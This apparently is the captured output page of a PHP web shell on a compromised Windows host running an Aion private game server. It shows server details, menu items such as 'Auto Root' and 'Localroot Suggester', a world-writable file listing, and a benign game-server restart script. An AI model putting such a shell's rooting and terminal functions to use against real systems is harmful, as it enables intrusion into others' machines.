Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Servidor Aion - OLD CLASS /
game-server /
Delete
Unzip
Name
Size
Permission
Date
Action
OldClassServer_Avisos_Compilador
[ DIR ]
drwxrwxrwx
2025-05-12 17:44
OldClassServer_Missions_Methods
[ DIR ]
drwxrwxrwx
2025-05-19 20:23
config
[ DIR ]
drwxrwxrwx
2025-01-12 04:34
data
[ DIR ]
drwxrwxrwx
2025-05-19 20:22
libs
[ DIR ]
drwxrwxrwx
2025-05-20 00:18
log
[ DIR ]
drwxrwxrwx
2025-06-02 10:00
sql
[ DIR ]
drwxrwxrwx
2025-01-12 04:38
Registro_craft.txt
8
B
-rw-rw-rw-
2025-03-24 05:07
gearSets.json
0
B
-rw-rw-rw-
2025-03-22 16:53
reward_track.json
0
B
-rw-rw-rw-
2025-03-22 16:53
start.bat
462
B
-rwxrwxrwx
2025-05-01 17:07
start.sh
1.86
KB
-rw-rw-rw-
2024-10-12 07:06
Save
Rename
#!/bin/bash #===================================================================================== # Usage: ./start.sh [jvmArgs] # Parameters: jvmArgs # additional arguments to the JVM process starting the server # Description: Starts the server and restarts it depending on returned exit code. #===================================================================================== loop() { while true; do java -Xms3G -Xmx6G -XX:+UseNUMA $@ -cp "libs/*" com.aionemu.gameserver.GameServer err=$? case $err in 0) # regular shutdown echo "Game server stopped." break ;; 1) # critical config or build error >&2 echo "Game server stopped with a fatal error." break ;; 2) # restart request echo "Restarting game server..." ;; 130) # SIGINT / Ctrl+C echo "Game server process was stopped." break ;; 137|143) # 137=SIGKILL, 143=SIGTERM echo "Game server process was killed." break ;; *) # other >&2 echo "Game server has terminated abnormally (code: $err), restarting in 5 seconds." sleep 5 ;; esac done exit $err } pid=$(jps -l | grep com.aionemu.gameserver.GameServer | awk '{print $1}') if [[ -n $pid ]]; then echo "Game server is already running (PID $pid)" read -p "Shut it down? (y/n) " answer if [[ $answer =~ ^y(es)?$ ]]; then if [[ -n $MSYSTEM ]]; then # MinGW (like Git Bash on Windows) /bin/kill -fW -SIGINT $pid # -W parameter tells kill command it's a Windows PID else kill -SIGINT $pid fi echo "Sent stop signal" until ! (jps -q | grep ^$pid$ > /dev/null); do echo "Waiting for shutdown..."; sleep 1; done else echo "Aborting server start" exit 1 fi fi cd "$(dirname "$(readlink -f "$0")")" loop $@